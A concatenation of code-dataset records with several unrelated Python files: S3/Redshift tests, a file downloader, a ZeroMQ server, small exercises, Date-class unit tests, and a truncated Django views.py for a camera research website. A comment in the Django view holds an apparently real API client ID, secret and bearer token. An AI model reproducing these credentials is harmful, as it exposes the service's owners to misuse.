\"genre_id\",\r\n ]\r\n )\r\n qf.to_csv(path_csv)\r\n s3_csv.from_file(keep_file=False)\r\n s3_csv.to_rds(dsn=\"redshift_acoe\", table=table_csv, schema=schema, if_exists=\"append\")\r\n assert len(qf_csv) == 60\r\n\r\n qf_csv.distinct()\r\n assert len(qf_csv) == 30\r\n\r\n source = Source(dsn=\"redshift_acoe\")\r\n source.drop_table(table=table_parquet, schema=schema)\r\n source.drop_table(table=table_csv, schema=schema)\r\n\r\n\r\ndef test_to_aurora():\r\n\r\n dsn = get_path(\"grizly_dev\", \"tests\", \"Chinook.sqlite\")\r\n qf = QFrame(dsn=dsn, db=\"sqlite\", dialect=\"mysql\").from_table(table=\"Track\")\r\n\r\n qf.window(offset=100, limit=30, order_by=[\"TrackId\"])\r\n\r\n qf.assign(LikeIt=\"CASE WHEN GenreId = 5 THEN 1 ELSE 0 END\", custom_type=\"BOOL\")\r\n qf.assign(SpareColumn=\"NULL\")\r\n\r\n qf.rename(\r\n {\r\n field: \"_\".join(re.findall(\"[A-Z][^A-Z]*\", alias)).lower()\r\n for field, alias in zip(qf.get_fields(aliased=False), qf.get_fields(aliased=True))\r\n }\r\n )\r\n\r\n s3_key = \"test/\"\r\n bucket = \"acoe-s3\"\r\n table_csv = \"grizly_test_csv\"\r\n schema = \"sandbox\"\r\n path_csv = get_path(\"grizly_test.csv\")\r\n\r\n s3_csv = S3(\r\n file_name=os.path.basename(path_csv),\r\n file_dir=os.path.dirname(path_csv),\r\n s3_key=s3_key,\r\n bucket=bucket,\r\n )\r\n\r\n qf.to_csv(path_csv)\r\n s3_csv.from_file(keep_file=False)\r\n s3_csv.to_aurora(table=table_csv, schema=schema, dsn=\"aurora_db\", if_exists=\"replace\")\r\n qf_csv = QFrame(dsn=\"aurora_db\").from_table(table=table_csv, schema=schema)\r\n assert len(qf_csv) == 30\r\n\r\n qf.rearrange(\r\n [\r\n \"composer\",\r\n \"milliseconds\",\r\n \"bytes\",\r\n \"unit_price\",\r\n \"like_it\",\r\n \"spare_column\",\r\n \"track_id\",\r\n \"name\",\r\n \"album_id\",\r\n \"media_type_id\",\r\n \"genre_id\",\r\n ]\r\n )\r\n qf.to_csv(path_csv)\r\n s3_csv.from_file(keep_file=False)\r\n s3_csv.to_aurora(table=table_csv, schema=schema, dsn=\"aurora_db\", if_exists=\"append\")\r\n assert len(qf_csv) == 60\r\n\r\n qf_csv.distinct()\r\n assert len(qf_csv) == 30\r\n\r\n Source(dsn=\"aurora_db\").drop_table(table=table_csv, schema=schema)\r\n\r\n\r\ndef test_to_serializable():\r\n s3 = S3(bucket=\"acoe-s3\", s3_key=\"test/\", file_name=\"test_s3.json\")\r\n serializable = s3.to_serializable()\r\n assert serializable == {\"a\": 42}\r\n\r\n\r\n# This will fail because of DataFrame replacing empty strings with NaN values\r\n# (lists(text() will generate a list of empty strings) - Michal\r\n# @pytest.mark.parametrize(\"ext\", [\"csv\", \"parquet\", \"xlsx\"])\r\n# @given(col1=lists(text(), min_size=3, max_size=3), col2=lists(integers(), min_size=3, max_size=3))\r\n# def test_from_df_to_df(col1, col2, ext):\r\n# d = {\"col1\": col1, \"col2\": col2}\r\n# df = DataFrame(data=d)\r\n# s3 = S3(f\"test.{ext}\", s3_key=\"grizly/\")\r\n# s3.from_df(df)\r\n# test_df = s3.to_df()\r\n# assert test_df.equals(df)\r\n","sub_path":"tests/test_s3.py","file_name":"test_s3.py","file_ext":"py","file_size_in_byte":6302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"164260500","text":"\"\"\"\nfiledownloader.py is a simple script to download all files of a certain type\n(e.g. pdf) from a web directory\n\ninput - target_directory, ftype, archive_url\nouput - all the files in that directory\n\"\"\"\n\nimport sys\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_file_links(ftype, archive_url):\n\n # create response object\n r = requests.get(archive_url)\n\n # create beautiful-soup object\n soup = BeautifulSoup(r.content, \"html5lib\")\n\n # find all links on web-page\n links = soup.findAll(\"a\")\n\n # filter the link sending with file type\n # specified by ftype (i.e. .pdf, .mp4 etc.)\n file_links = [\n archive_url + link[\"href\"] for link in links if link[\"href\"].endswith(ftype)\n ]\n\n return file_links\n\n\ndef download_files(file_links):\n\n for link in file_links:\n\n \"\"\"iterate through all links in file_links\n and download them one by one\"\"\"\n\n # obtain filename by splitting url and getting\n # last string\n file_name = link.split(\"/\")[-1]\n\n print(\"Downloading file:%s\" % file_name)\n\n # create response object\n r = requests.get(link, stream=True)\n\n # download started\n with open(file_name, \"wb\") as f:\n for chunk in r.iter_content(chunk_size=1024 * 1024):\n if chunk:\n f.write(chunk)\n\n print(\"%s downloaded!\\n\" % file_name)\n\n print(\"All files downloaded!\")\n return\n\n\ndef main():\n target_directory = sys.argv[1]\n os.chdir(target_directory)\n ftype = sys.argv[2]\n archive_url = sys.argv[3]\n file_links = get_file_links(ftype, archive_url)\n os.chdir(target_directory)\n download_files(file_links)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"file_downloader.py","file_name":"file_downloader.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"589113915","text":"import datetime\nimport zmq\n\n# Socket to talk to clients.\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind(\"tcp://*:5555\")\n\n# Server thread loop.\nwhile True:\n # Blocking call.\n # Wait for next request from client.\n message = socket.recv()\n\n # Get current time on client request.\n time = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # Send reply back to client.\n socket.send(time.encode('UTF-8'))\n\n# Clean up.\nsocket.close()\ncontext.term()\n","sub_path":"demo_01/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"536582732","text":"# La secuencia de Fibonacci es una función matemática que se define recursivamente.\n# En el año 1202, el matemático italiano Leonardo de Pisa, también conocido como Fibonacci, \n# encontró una fórmula para cuantificar el crecimiento que ciertas poblaciones experimentan.\n\n# Imagina que una pareja de conejos nace, un macho y una hembra, y luego son liberados.\n# Imagina, también, que los conejos se pueden reproducir hasta la edad de un mes y que tienen un periodo de gestación también de un mes.\n# Por último imagina que estos conejos nunca mueren y que la hembra siempre es capaz de producir una nueva pareja (un macho y una hembra).\n# ¿Cuántos conejos existirán al final de seis meses?\n\ndef fibonacci(n):\n if n == 0 or n == 1:\n return 1\n\n return fibonacci(n - 1) + fibonacci(n - 2)\n\nn = int(input('Ingrese un cantidad de meses'))\n\nprint(f'{fibonacci(n)} Conejos al final de {n} meses')","sub_path":"25_fibonnacci.py","file_name":"25_fibonnacci.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"308778753","text":"from date import Date, TimeDelta\nimport unittest\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_init(self):\n for i in (-1, 1, 32):\n date = i\n for j in (-1, 1, 13):\n month = j\n for k in (0, 1):\n if i == 1 and j == 1 and k == 1:\n pass\n else:\n year = k\n with self.assertRaises(ValueError):\n some_date = Date(date, month, year)\n date1, month1, year1 = 1, 1, 1\n with self.assertRaises(ValueError):\n Date(date1, month1)\n with self.assertRaises(ValueError):\n Date(\"2.2\")\n self.assertEqual(str(Date(\"2.2.2\")), \"02.02.0002\")\n\n def test_repr(self):\n date = 1\n month = 1\n year = 1\n test_date = Date(date, month, year)\n test_timedelta = TimeDelta(date, month, year)\n self.assertEqual(test_date.__repr__(), f\"Date({date}, {month}, {year})\", \"Should be 'Date(1, 1, 1)'\")\n self.assertEqual(test_timedelta.__repr__(), f\"TimeDelta({date},\"\n f\" {month}, {year})\", \"Should be 'TimeDelta(1, 1, 1)'\")\n\n def test_str(self):\n day, month, year = 1, 1, 1\n test_date = Date(day, month, year)\n test_timedelta = TimeDelta(day, month, year)\n self.assertEqual(str(test_date), \"01.01.0001\")\n self.assertEqual(str(test_timedelta), f'{day} day(s), {month} month(s), {year} year(s)')\n day, month, year = 11, 1, 1\n test_date = Date(day, month, year)\n test_timedelta = TimeDelta(day, month, year)\n self.assertEqual(str(test_date), \"11.01.0001\")\n self.assertEqual(str(test_timedelta), f'{day} day(s), {month} month(s), {year} year(s)')\n day, month, year = 11, 11, 1\n test_date = Date(day, month, year)\n test_timedelta = TimeDelta(day, month, year)\n self.assertEqual(str(test_date), \"11.11.0001\")\n self.assertEqual(str(test_timedelta), f'{day} day(s), {month} month(s), {year} year(s)')\n day, month, year = 11, 11, 11\n test_date = Date(day, month, year)\n test_timedelta = TimeDelta(day, month, year)\n self.assertEqual(str(test_date), \"11.11.0011\")\n self.assertEqual(str(test_timedelta), f'{day} day(s), {month} month(s), {year} year(s)')\n year = 111\n test_date = Date(day, month, year)\n test_timedelta = TimeDelta(day, month, year)\n self.assertEqual(str(test_date), \"11.11.0111\")\n self.assertEqual(str(test_timedelta), f'{day} day(s), {month} month(s), {year} year(s)')\n year = 1111\n test_date = Date(day, month, year)\n test_timedelta = TimeDelta(day, month, year)\n self.assertEqual(str(test_date), \"11.11.1111\")\n self.assertEqual(str(test_timedelta), f'{day} day(s), {month} month(s), {year} year(s)')\n\n def test_is_leap_year(self):\n answers = []\n for year in (1, 100, 400, 1000, 2001):\n test_date = Date(11, 11, year)\n answers.append(test_date.is_leap_year(year))\n self.assertEqual(answers, [False, False, True, False, False])\n with self.assertRaises(ValueError):\n test_date.is_leap_year(\"f\")\n\n def test_get_max_days(self):\n j = 1\n for i in (31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31):\n test_date = Date(11, j, 400)\n self.assertEqual(test_date.get_max_day(test_date.month, test_date.year), i)\n j += 1\n j = 1\n for i in (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31):\n test_date = Date(11, j, 401)\n self.assertEqual(test_date.get_max_day(test_date.month, test_date.year), i)\n j += 1\n\n def test_is_valid_date(self):\n with self.assertRaises(ValueError):\n Date(29, 2, 401)\n\n def test_setters(self):\n test_date = Date(11, 11, 1111)\n test_date.day = 12\n test_date.month = 12\n test_date.year = 1112\n test_date = Date(1, 1, 1)\n\n def test_setters_incorrect(self):\n test_date = Date(1, 1, 1)\n with self.assertRaises(ValueError):\n test_date.day = 32\n with self.assertRaises(ValueError):\n test_date.month = 13\n with self.assertRaises(ValueError):\n test_date.year = 0\n\n def test_sub(self):\n test_date1 = Date(11, 11, 1111)\n test_date2 = Date(12, 12, 1112)\n self.assertEqual(test_date1 - test_date2, -398)\n test_date2 = Date(12, 12, 400)\n self.assertEqual(test_date1 - test_date2, 259654)\n\n def test_sub_incorrect(self):\n test_date1 = Date(11, 11, 1111)\n test_date2 = \"OLOLO\"\n res = test_date1.__sub__(test_date2)\n self.assertEqual(res, NotImplemented)\n\n def test_add(self):\n test_date = Date(11, 11, 1111)\n timedelta = TimeDelta(1, 1, 1)\n summ = test_date + timedelta\n self.assertEqual(str(summ), \"12.12.1112\")\n test_date = Date(28, 2, 400)\n timedelta = TimeDelta(2, 11, 400)\n summ = test_date + timedelta\n self.assertEqual(str(summ), \"01.02.0801\")\n test_date = Date(1, 10, 1)\n timedelta = TimeDelta(30, 1, 0)\n summ = test_date + timedelta\n self.assertEqual(str(summ), \"01.12.0001\")\n\n def test_iadd(self):\n test_date = Date(11, 11, 1111)\n timedelta = TimeDelta(1, 1, 1)\n test_date += timedelta\n self.assertEqual(str(test_date), \"12.12.1112\")\n test_date = Date(28, 2, 400)\n timedelta = TimeDelta(2, 9, 400)\n test_date += timedelta\n self.assertEqual(str(test_date), \"01.12.0800\")\n test_date = Date(31, 12, 400)\n timedelta = TimeDelta(1, 0, 0)\n test_date += timedelta\n self.assertEqual(str(test_date), \"01.01.0401\")\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"tests/test_unittest.py","file_name":"test_unittest.py","file_ext":"py","file_size_in_byte":5922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"442355507","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\nm = int(input())\nvip = [int(input().split()[0]) for _ in range(m)]\nseats = [i for i in range(1, n+1)]\n\ndp = [0] * 41\ncount = 0\nanswer = 1\n\nvip.sort(reverse=True)\n\ndef fibo(n):\n if n == 0 or n == 1:\n return 1\n if dp[n]:\n return dp[n]\n else:\n dp[n] = fibo(n-1) + fibo(n-2)\n return dp[n]\n\n\nfor i in range(n+1):\n if i == n:\n answer *= fibo(count)\n if vip and seats[i] == vip[-1]:\n vip.pop()\n answer *= fibo(count)\n count = 0\n else:\n count += 1\nprint(answer)","sub_path":"hiseoung/BOJ/DP/20220815_BOJ_2302_극장좌석.py","file_name":"20220815_BOJ_2302_극장좌석.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"130820953","text":"import os\nimport json\nimport urllib\nimport sys\nimport requests\nimport json\nimport datetime\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.auth import login, update_session_auth_hash\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom social_django.models import UserSocialAuth\nfrom django.utils.encoding import force_text, force_bytes\nfrom django.utils.http import urlsafe_base64_decode, urlsafe_base64_encode\nfrom .tokens import account_activation_token\nfrom .forms import RegistrationForm, AdditionalForm, AppForm, ProfileEmailForm, NameForm, ReportForm\nfrom django.contrib.auth.models import User\nfrom django.core.mail import mail_admins, send_mail\nfrom .models import Homepage, FAQ, History, Publication, Team, Leader, TeamMember, CAM2dbApi, RegisterUser, Collab, Location, Sponsor, Poster, ReportedCamera, Calendar, Video, Subteam, Member\nfrom django.http import HttpResponseNotFound\nfrom cam2webui.settings import EMAIL_HOST_USER, MANAGER_EMAIL\nimport logging\n\n# Get an instance of a logger\nlogger = logging.getLogger(__name__)\n\n\ndef index(request):\n slide = Homepage.objects.reverse()\n context = {'slide_list': slide}\n return render(request, 'app/index.html', context)\n\ndef cameras(request):\n# context = {'google_api_key': settings.GOOGLE_API_KEY,\n# 'google_client_id': settings.GOOGLE_CLIENT_ID}\n if request.method == 'POST':\n form = ReportForm(request.POST)\n if form.is_valid():\n #recaptcha_response = request.POST.get('g-recaptcha-response')\n #url = 'https://www.google.com/recaptcha/api/siteverify'\n #values = {\n # 'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,\n # 'response': recaptcha_response\n #}\n #data = urllib.parse.urlencode(values).encode()\n #req = urllib.request.Request(url, data=data)\n #response = urllib.request.urlopen(req)\n #result = json.loads(response.read().decode())\n #if result['success']:\n\n #get info from form\n camID = form.cleaned_data['cameraID']\n #add info to email template\n #content = render_to_string('app/cam_report_email_template.html', {\n # 'cameraID': camID,\n #})\n #send_mail(\"Camera with Unavailable Image Reported\", content, EMAIL_HOST_USER, [MANAGER_EMAIL])#email admin\n #check for existing reported camera\n camidlist = ReportedCamera.objects.reverse().values_list(\"cameraID\", flat=True)\n user = None\n if (request.user.is_authenticated):\n user = request.user.username\n\n if camID not in camidlist:\n #add info to admin database - using cleaned_data\n\n\n cam_obj = ReportedCamera(username=user, cameraID=camID, reporttime=datetime.datetime.now())\n cam_obj.save()\n\n else:\n cams = ReportedCamera.objects.filter(cameraID__exact=camID)\n logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n logging.debug('This is the user : ' + str(cams))\n if(cams):\n for c in cams:\n if (not user in str(c.username)):\n c.username = str(c.username) + ', ' + user\n c.save()\n\n\n #return redirect('email_sent')\n form = ReportForm()\n messages.success(request, 'The unavailable image has been reported. Thank you!')\n\n\n\n else:\n form = ReportForm()\n\n return render(request, \"app/cameras.html\", {'form': form})\n #return render(request, 'app/cameras.html')\n\ndef good_cameras(request):\n return render(request, 'app/good_cameras.html')\n\ndef team(request):\n \"\"\"Renders content for the Team page\n\n Retrieves information from the Team database using the matching Django Model structure.\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed.\n\n Returns:\n A render that displays the page team.html, complete with information from the Team database. \"\"\"\n \n team_list = Team.objects.reverse()\n leader_list = Leader.objects.reverse()\n curmember_list = Member.objects.filter(iscurrentmember=True).order_by(\"membername\")\n oldmember_list = TeamMember.objects.filter(iscurrentmember=False).order_by(\"name\")\n director_list = TeamMember.objects.filter(isdirector=True).order_by(\"name\")\n subteam = Subteam.objects.all()\n members = TeamMember.objects.all()\n \n # Sub team\n image_list = Member.objects.filter(subteam__exact='I').order_by(\"membername\")\n webui_list = Member.objects.filter(subteam__exact='UI').order_by(\"membername\")\n api_list = Member.objects.filter(subteam__exact='D+API').order_by(\"membername\")\n parallel_list = Member.objects.filter(subteam__exact='PP').order_by(\"membername\")\n resource_list = Member.objects.filter(subteam__exact='RM').order_by(\"membername\")\n software_list = Member.objects.filter(subteam__exact='SE').order_by(\"membername\")\n mobile_list = Member.objects.filter(subteam__exact='MA').order_by(\"membername\")\n cameraRelia_list = Member.objects.filter(subteam__exact='CR').order_by(\"membername\")\n cameraDisco_list = Member.objects.filter(subteam__exact='CD').order_by(\"membername\")\n transfer_list = Member.objects.filter(subteam__exact='TL').order_by(\"membername\")\n activeTraining_list = Member.objects.filter(subteam__exact='AT').order_by(\"membername\")\n imageData_list = Member.objects.filter(subteam__exact='ID').order_by(\"membername\")\n drone_list = Member.objects.filter(subteam__exact='DV').order_by(\"membername\")\n forest_list = Member.objects.filter(subteam__exact='FIA').order_by(\"membername\")\n human_list = Member.objects.filter(subteam__exact='HB').order_by(\"membername\")\n crowd_list = Member.objects.filter(subteam__exact='CS').order_by(\"membername\")\n intel_list = Member.objects.filter(subteam__exact='Intel').order_by(\"membername\")\n active_list = Member.objects.filter(subteam__exact='').filter(iscurrentmember=True).order_by(\"membername\") \n\n context = {\n \"team_list\": team_list,\n \"leader_list\": leader_list,\n \"curmember_list\": curmember_list,\n \"oldmember_list\": oldmember_list,\n \"image_list\": image_list,\n \"api_list\": api_list,\n \"webui_list\": webui_list,\n \"parallel_list\": parallel_list,\n \"resource_list\": resource_list,\n \"software_list\": software_list,\n \"mobile_list\": mobile_list,\n \"cameraRelia_list\": cameraRelia_list,\n \"cameraDisco_list\": cameraDisco_list,\n \"transfer_list\": transfer_list,\n \"activeTraining_list\": activeTraining_list,\n \"imageData_list\": imageData_list,\n \"drone_list\": drone_list,\n \"forest_list\": forest_list,\n \"human_list\": human_list,\n \"crowd_list\": crowd_list,\n \"intel_list\": intel_list,\n 'subteams_list': subteam,\n \"members_list\": members,\n \"director_list\": director_list,\n \"active_list\": active_list\n } \n return render(request, 'app/team.html', context) \n\n\"\"\"def team(request):\n team_list = Team.objects.reverse()\n leader_list = Leader.objects.reverse()\n oldmember_list = TeamMember.objects.filter(iscurrentmember=False).order_by(\"name\")\n director_list = TeamMember.objects.filter(isdirector=True).order_by(\"name\")\n subteam = Subteam.objects.all()\n members = TeamMember.objects.all()\n context = {'subteams_list': subteam, \"team_list\": team_list,\"leader_list\": leader_list, \"members_list\": members, \"oldmember_list\": oldmember_list, \"director_list\": director_list}\n return render(request, 'app/team.html', context)\"\"\"\n\ndef team_poster(request):\n poster_images = Poster.objects.reverse()\n context = {\"poster_images\": poster_images}\n return render(request, 'app/team_poster.html', context)\n\ndef training(request):\n\treturn render(request, 'app/training.html')\n\ndef privacy(request):\n return render(request, 'app/privacy.html')\n\ndef terms(request):\n return render(request, 'app/terms.html')\n\ndef acknowledgement(request):\n return render(request, 'app/ack.html')\n\ndef collaborators(request):\n collab = Collab.objects.reverse()\n context = {'collab_list': collab}\n return render(request, 'app/collaborators.html', context)\n\ndef sponsors(request):\n sponsor = Sponsor.objects.reverse()\n context = {'sponsor_list': sponsor}\n return render(request, 'app/sponsors.html', context)\n\ndef calendar(request):\n cal = Calendar.objects.reverse()\n context = {'calendar_list': cal}\n return render(request, 'app/calendar.html', context)\n\ndef location(request):\n loc = Location.objects.reverse()\n context = {'loc_list': loc}\n return render(request, 'app/location.html', context)\n\n#Addition for Testimony Video\ndef testimony_vid1(request):\n\treturn render(request, 'app/testimony_vid.html')\n#def contact(request):\n# return render(request, 'app/contact.html')\n\ndef faqs(request):\n \"\"\"Renders content for the FAQs page\n\n Retrieves information from the FAQ database using the matching Django Model structure.\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed.\n\n Returns:\n A render that displays the page faq.html, complete with information from the FAQs database.\n \"\"\"\n question_list = FAQ.objects.reverse()\n context = {'question_list': question_list}\n return render(request, 'app/faq.html', context)\n\ndef history(request):\n \"\"\"Renders content for the History page\n\n Retrieves information from the History database using the matching Django Model structure.\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed.\n\n Returns:\n A render that displays the page history.html, complete with information from the History database.\n \"\"\"\n history_list = History.objects.order_by('-year', '-month')\n context = {'history_list': history_list}\n return render(request, 'app/history.html', context)\n\ndef publications(request):\n \"\"\"Renders content for the Publications page\n\n Retrieves information from the Publications database using the matching Django Model structure.\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed.\n\n Returns:\n A render that displays the page publications.html, complete with information from the Publications database.\n \"\"\"\n publication_list = Publication.objects.reverse()\n paginator = Paginator(publication_list, 6)\n page = request.GET.get('page')\n\n try:\n publication_paginator = paginator.page(page)\n except PageNotAnInteger:\n publication_paginator = paginator.page(1)\n except EmptyPage:\n publication_paginator = paginator.page(paginator.num_pages)\n\n\n index = publication_paginator.number - 1\n max_index = len(paginator.page_range)\n start_index = index - 5 if index >= 5 else 0\n end_index = index + 5 if index <= max_index - 5 else max_index\n page_range = paginator.page_range[start_index:end_index]\n\n context = {'publication_list': publication_paginator, 'page_range':page_range}\n return render(request, 'app/publications.html', context)\n\ndef new_map(request):\n #client = '34b9eb8afc032098bc96174ec38ca2dba940a401d03c311251af4d8b609f7272c91ed0aaef1ee4eddb4783bcaa3ead7d'\n #secret = 'b0eaea176c29331149557b1c2fe54b82d335c8c30dbed9a50c5e4aa141b15dbefbbfd69'\n #header = {'Authorization': 'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjbGllbnRJRCI6IjM0YjllYjhhZmMwMzIwOThiYzk2MTc0ZWMzOGNhMmRiYTk0MGE0MDFkMDNjMzExMjUxYWY0ZDhiNjA5ZjcyNzJjOTFlZDBhYWVmMWVlNGVkZGI0NzgzYmNhYTNlYWQ3ZCIsInBlcm1pc3Npb25MZXZlbCI6InVzZXIiLCJpYXQiOjE1MjgxMjkxNTAsImV4cCI6MTUyODEyOTQ1MH0.xaTv3iT7KJKoQlgZrlpm0d4RuhWjniL5QG6K_RqUWVQ'}\n #params = {'clientID': client, 'clientSecret': secret}\n #rauth = requests.get('https://cam2-api.herokuapp.com/auth', params=params)\n #token = rauth.json()['token']\n #headerval = 'Bearer ' + token\n #header = {'Authorization': headerval}\n #r = requests.get('https://cam2-api.herokuapp.com/cameras/search', headers=header)\n #datalen = len(r.json())\n #data = r.json()\n with open('app/cam_data.json') as f:\n data = json.load(f)\n return render(request, 'app/new_map.html', {'data': data})\n\ndef good_map(request):\n with open('app/cam_data.json') as f:\n data = json.load(f)\n return render(request, 'app/new_map_good.html', {'data': data})\n\ndef advice(request):\n return render(request, 'app/advice.html')\n\ndef register(request):\n \"\"\"Renders content for the Registration form page\n\n Uses the Django Forms structure outlined in forms.py to create a form for users to use\n to register their information. When the user submits this form, it validates it to ensure\n that the values are acceptable and that the required fields were filled, then it stores\n the contents of the form into the Django Admin database for Users. Once this is complete,\n an email is sent to the provided email address that contains an activation link for the user\n to click.\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed or the submitted form.\n\n Returns:\n A render that displays the form page if the page was just accessed or the form was invalid,\n or a redirection to a page that confirms that the account was registered.\n \"\"\"\n if request.method == 'POST':\n form1 = RegistrationForm(request.POST)\n form2 = AdditionalForm(request.POST)\n\n\n if form1.is_valid() and form2.is_valid():\n\n recaptcha_response = request.POST.get('g-recaptcha-response')\n url = 'https://www.google.com/recaptcha/api/siteverify'\n values = {\n 'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,\n 'response': recaptcha_response\n }\n data = urllib.parse.urlencode(values).encode()\n req = urllib.request.Request(url, data=data)\n response = urllib.request.urlopen(req)\n result = json.loads(response.read().decode())\n if result['success']:\n model1 = form1.save(commit=False) #Required information of user\n model1.is_active = False #Set true for testing without email.\n model1.save()\n model2 = form2.save(commit=False) #Optional information of user\n model2.user = model1\n model2.save()\n\n #Email user\n current_site = get_current_site(request)\n subject = 'Activate Your CAM2 Account'\n message = render_to_string('app/confirmation_email.html', {\n 'user': model1,\n 'domain': current_site.domain,\n 'uid': urlsafe_base64_encode(force_bytes(model1.pk)).decode(),\n 'token': account_activation_token.make_token(model1),\n })\n model1.email_user(subject, message)\n\n return redirect('email_confirmation_sent')\n else:\n messages.error(request, 'Invalid reCAPTCHA. Please confirm you are not a robot and try again.')\n if 'test' in sys.argv:\n sitekey = os.environ['RECAPTCHA_TEST_SITE_KEY']\n else:\n sitekey = os.environ['RECAPTCHA_SITE_KEY']\n else:\n if 'test' in sys.argv:\n sitekey = os.environ['RECAPTCHA_TEST_SITE_KEY']\n else:\n sitekey = os.environ['RECAPTCHA_SITE_KEY']\n else:\n form1 = RegistrationForm()\n form2 = AdditionalForm()\n if 'test' in sys.argv:\n sitekey = os.environ['RECAPTCHA_TEST_SITE_KEY']\n else:\n sitekey = os.environ['RECAPTCHA_SITE_KEY']\n\n return render(request, 'app/register.html', {'form1': form1, 'form2': form2, 'sitekey': sitekey})\n\ndef email_confirmation_sent(request):\n return render(request, 'app/email_confirmation_sent.html')\n\ndef email_confirmation_invalid(request):\n return render(request, 'app/email_confirmation_invalid.html')\n\ndef account_activated(request):\n return render(request, 'app/account_activated.html')\n\ndef activate(request, uidb64, token):\n \"\"\"Renders content for account activation\n\n Determines which user is attempting to activate their account based on the encoded section of the\n URL used to access the page, sets the user's account to an activated state and saves the change\n to the database, emails the system administrator about the newly registered account, logs the user\n in, and redirects them to the site.\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed.\n uidb64: an encoded form of the user id used in activation.\n token: the access token for activation given by the activation link.\n\n Returns:\n Either a redirection to the site indicating successful confirmation, or a rendering of a page\n that indicates a failure to activate the account.\n \"\"\"\n \"\"\"Followed tutorial: https://simpleisbetterthancomplex.com/tutorial/2017/02/18/how-to-create-user-sign-up-view.html\"\"\"\n try:\n uid = force_text(urlsafe_base64_decode(uidb64))\n user = User.objects.get(pk=uid)\n except (TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.registeruser.email_confirmed = True\n user.save()\n\n optional = RegisterUser.objects.get(user=user) #get optional info of user\n #email admin\n admin_subject = 'New User Registered'\n admin_message = render_to_string('app/new_user_email_to_admin.html', {\n 'user': user,\n 'optional': optional,\n })\n\n\n mail_admins(admin_subject, admin_message)\n login(request, user, backend=\"django.contrib.auth.backends.ModelBackend\")\n return redirect('account_activated')\n else:\n return render(request, 'email_confirmation_invalid.html')\n\n@login_required\ndef profile(request):\n \"\"\"Renders content for the Profile page\n\n For a user that's currently logged in, displays information currently stored in the database\n for that user (First Name, Last Name, email, etc...), and allows the User to modify that\n information using a form.\n\n Also pulls information provided by Github sign-in, if Github authentication was used to access\n the site.\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed.\n\n Returns:\n A render that displays the user's profile page, complete with all information accessible from the\n Django admin database for that specific user.\n \"\"\"\n user = request.user\n try:\n github_login = user.social_auth.get(provider='github')\n except UserSocialAuth.DoesNotExist:\n github_login = None\n\n #initialize forms\n app_form = AppForm()\n apps = CAM2dbApi.objects.filter(user=request.user).values()\n emailForm = ProfileEmailForm(instance=user)\n try:\n optional = RegisterUser.objects.get(user=user)\n except:# If cannot find RegisterUser object(social login users), create one\n add_form = AdditionalForm({})\n optional = add_form.save(commit=False)\n optional.user = user\n optional.save()\n infoForm = AdditionalForm(instance=optional)#get form with info of a specific instance\n\n\n '''\n # Enter name for social login users\n if request.method == 'POST' and 'saveName' in request.POST:\n nameForm = NameForm(request.POST, instance=user)\n if nameForm.is_valid():\n nameForm.save()\n messages.success(request, 'Thank you! Your name has been updated.')\n else:\n nameForm = NameForm(instance=user)\n messages.error(request, 'Something went wrong. Please try again or contact us!')\n #return redirect('profile')\n return render(request, 'app/profile.html', form_dict)\n '''\n # Add app\n if request.method == 'POST' and 'add' in request.POST:\n app_form = AppForm(request.POST)\n if app_form.is_valid():\n dbapp = app_form.save(commit=False)\n dbapp.user = request.user\n dbapp.save()\n return redirect('profile')\n else:\n app_form = AppForm()\n #messages.error(request, 'Something went wrong. Please try again or contact us!')\n #return render(request, 'app/profile.html', form_dict)\n\n # Change Email\n if request.method == 'POST' and 'changeEmail' in request.POST:\n emailForm = ProfileEmailForm(request.POST, instance=user)\n if emailForm.is_valid():\n emailForm.save()\n messages.success(request, 'Your Email has been successfully updated!')\n return redirect('profile')\n else:\n emailForm=ProfileEmailForm(instance=user)\n #messages.error(request, 'Something went wrong. Please try again or contact us!')\n #return render(request, 'app/profile.html', form_dict)\n\n # Modify Profile\n if request.method == 'POST' and 'changeInfo' in request.POST:\n infoForm = AdditionalForm(request.POST, instance=optional)\n if infoForm.is_valid():\n infoForm.save()\n messages.success(request, 'Your information has been successfully updated!')\n return redirect('profile')\n else:\n 